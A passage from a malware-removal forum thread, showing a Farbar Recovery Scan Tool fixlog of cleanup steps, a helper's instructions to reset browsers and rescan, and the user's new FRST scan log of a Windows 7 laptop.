C:\ProgramData\Temp => ":426D1496" ADS removed successfully.
C:\ProgramData\Temp => ":8A620099" ADS removed successfully.
C:\ProgramData\Temp => ":9AB56A06" ADS removed successfully.
C:\ProgramData\Temp => ":E73B14E2" ADS removed successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\30553336.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\55732387.sys" => key removed successfully
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30" => key removed successfully
HKCU\\software\\zorrezmj => could not remove key.: incorrect path.
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30 => could not remove key. ErrorCode: 0xC0000033

========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.

========= End of Reg: =========

========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.

========= End of Reg: =========

========= bitsadmin /reset /allusers =========

BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Unable to cancel {ED0346BF-A3A2-4A28-8A8A-79F817262CA3}.
{1E80B1D0-B98A-4FA7-B087-23A0C07A91F7} canceled.
{59C5CDDB-BCBA-47F9-9081-20247362EEC7} canceled.
{5525C2C5-5533-4DB3-B9E1-F05E8599FA42} canceled.
{E30D3862-D9C6-47AE-BA2C-B9DF9524F31D} canceled.
{B3CB8EEA-7218-4391-A578-783D38BE2E0A} canceled.
{09D9AA74-C446-4314-882E-C0412A77A73F} canceled.
{44A3B125-C850-47CF-9198-5395479889E4} canceled.
{A5A2E9CB-4986-4147-89BB-05EAF73B8D18} canceled.
{BB086309-A472-4933-91F1-3594C942C388} canceled.
{3C5C9742-865B-46AE-A66B-B6EE2E60B04A} canceled.
{1AB6C52C-DE46-4264-9864-C8C88327E845} canceled.
{6489D4AC-2A8D-448B-B873-83201339612E} canceled.
{991B226B-16D7-41F4-B224-A795E6F3D569} canceled.
{EC2CA711-1BC7-45E7-8E46-E110F69BE5EE} canceled.
{183DBE47-5953-4134-BD9C-DE5718D6D06F} canceled.
{8583975A-1940-4229-944C-9DFEA9AD605A} canceled.
{6C1B4F50-9205-4E82-AB89-7BCD1E92B4E1} canceled.
17 out of 18 jobs canceled.

========= End of CMD: =========

========= netsh winsock reset catalog =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully

========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 58908930 B
Java, Flash, Steam htmlcache => 132509 B
Windows/system/drivers => 1453185661 B
Edge => 0 B
Chrome => 46220099 B
Firefox => 381194998 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 78315242 B
systemprofile32 => 115508 B
LocalService => 132244 B
NetworkService => 67452 B
Owner => 1474150383 B

RecycleBin => 288752171 B
EmptyTemp: => 3.5 GB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 15:16:48 ====

#4
zep516

Posted 30 November 2016 - 02:35 PM

Trusted Helper

Malware Removal
8,093 posts

Please reset your web browsers
To do that
http://www.howtogeek...fault-settings/

Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

Double-click to run it. When the tool opens click Yes to disclaimer.
Make sure you checkmark Addition.txt box.
Press Scan button.
Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.

#5
dreamtime

Posted 01 December 2016 - 01:46 PM

New Member

Topic Starter
Member
6 posts

Done.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-11-2016
Ran by Owner (administrator) on OWNER-HP (01-12-2016 14:41:06)
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AMD) C:\Windows\System32\atieclxx.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiWatchDog.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe
() C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Online Games Manager\ogmservice.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtWatchDog.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2281256 2013-07-05] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6489704 2013-07-16] (Realtek Semiconductor)
HKLM\...\Run: [HPWirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe [363064 2010-06-18] (Hewlett-Packard Company)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [Trend Micro Client Framework] => C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe [246264 2015-07-16] (Trend Micro Inc.)
HKLM\...\Run: [Platinum] => C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe [1258496 2015-07-16] (Trend Micro Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-06-17] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-03-24] (Hewlett-Packard)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [586296 2010-11-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe [1712184 2010-02-09] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [146736 2013-11-13] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Kaspersky Software Updater Beta.lnk [2016-11-26]
ShortcutTarget: Kaspersky Software Updater Beta.lnk -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Software Updater Beta\ksu.exe (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2013-12-25]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office10\OSA.EXE (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerReg Scheduler.exe [2012-11-11] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C05AD519-926E-46DA-A286-D6B3A0E85834}: [DhcpNameServer] 168.94.0.15 168.94.0.14
Tcpip\..\Interfaces\{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
BHO: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-08-23] (HP Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems Incorporated)
BHO-x32: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
BHO-x32: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-08-23] (HP Inc.)
Toolbar: HKLM - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
Handler-x32: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
Handler: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
Handler: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler-x32: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\ve78rhlb.default-1480619905508 [2016-12-01]
FF NetworkProxy: Mozilla\Firefox\Profiles\ve78rhlb.default-1480619905508 -> no_proxies_on", "https://localhost, localhost, 127.0.0.1"
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF Extension: (Trend Micro BEP Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension [2016-10-21]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF HKLM-x32\...\Firefox\Extensions: [{22181a4d-af90-4ca3-a569-faed9118d6bc}] - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension
FF Extension: (Trend Micro Toolbar) - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension [2016-11-13]
FF HKLM-x32\...\Firefox\Extensions: [{BBB77B49-9FF4-4d5c-8FE2-92B1D6CD696C}] - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension
FF Extension: (Trend Micro Osprey Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension [2016-10-22]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-12] ()
FF Plugin: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\6\NP_wtapp.dll [2012-10-23] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default [2016-12-01]
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-26]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-26]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-26]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-26]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-26]
CHR Extension: (Google Docs Offline) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-26]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-26]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-26]
CHR Extension: (Chrome Media Router) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-26]
CHR HKLM-x32\...\Chrome\Extension: [ohhcpmplhhiiaoiddkfboafbhiknefdf] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [29728 2016-08-15] (HP Inc.)
R2 kss; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 ogmservice; C:\Program Files (x86)\Online Games Manager\ogmservice.exe [582544 2016-07-13] (RealNetworks, Inc.)
R2 Platinum Host Service; C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe [1137664 2015-07-16] (Trend Micro Inc.)
R2 PwmSvc; C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe [2458624 2016-09-01] (Trend Micro Inc.)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-24] (Realtek Semiconductor Corp.) [File not signed]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S2 Amsp; "C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe" coreFrameworkHost.exe -m=rb -dt=60000 -ad -bt=0 [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 31DADE60; C:\Windows\System32\drivers\31DADE60.sys [478392 2016-11-26] (Kaspersky Lab ZAO)
R1 tmactmon; C:\Windows\System32\DRIVERS\tmactmon.sys [140504 2016-08-10] (Trend Micro Inc.)
R0 tmcomm; C:\Windows\System32\DRIVERS\tmcomm.sys [332512 2016-08-10] (Trend Micro Inc.)
R0 TMEBC; C:\Windows\System32\DRIVERS\TMEBC64.sys [59712 2015-06-11] (Trend Micro Inc.)
R3 tmeevw; C:\Windows\System32\DRIVERS\tmeevw.sys [116576 2015-06-08] (Trend Micro Inc.)
R1 tmevtmgr; C:\Windows\System32\DRIVERS\tmevtmgr.sys [106720 2016-08-10] (Trend Micro Inc.)
